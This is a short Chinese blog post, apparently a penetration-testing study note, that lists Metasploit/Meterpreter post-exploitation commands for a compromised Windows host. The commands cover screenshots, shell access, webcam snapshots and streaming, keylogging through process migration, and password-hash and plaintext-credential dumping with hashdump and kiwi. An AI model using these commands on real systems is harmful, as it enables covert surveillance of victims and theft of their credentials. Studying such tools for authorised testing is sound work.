0x03后渗透

子怡发布于 2023-06-21 98 次阅读

AI 摘要

文章标题：0x03后渗透后渗透指令可以让黑客获取受害者系统的控制权，其中包括命令操作、截取桌面截图、进入命令行进行操作，甚至改变编码方式以绕过限制。黑客可以查看权限并获取Windows系统的最高权限System，以便执行更多的恶意操作。除此之外，黑客还可以利用后渗透技术进行拍照、键盘监听以及抓取密码等操作，进一步侵犯受害者的隐私和安全。

后渗透

命令

桌面截图

screenshot

进入受害者命令行

shell
- 改乱码（改变编码方式）
  - chcp 65001
- 查看权限
  - whoami
    - Windows最高权限：System
- 退出
  - exit

拍照

检测摄像头设备
- webcam_list
拍照
- webcam_snap
摄影、视频
- webcam_stream

键盘监听

查看windows运行进程
- ps
进程迁移/监听
- migrate -P PID
开始监听
- keyscan_start
获取监听
- keyscan_dump
停止监听
- keyscan_stop

抓取密码

抓取加密以后的密码
- hashdump
  - 加密方式：MD5，解密网站：https://www.cmd5.com/
抓取明文密码
- kiwi help
- creds_wdigest

上一篇文章

转载｜罗翔老师给2023届毕业生的寄语

下一篇文章

0x04MSF恶意程序利用+CS上线

查看评论 - NOTHING

Comments NOTHING

暂无评论

取消回复

要发表评论，您必须先登录。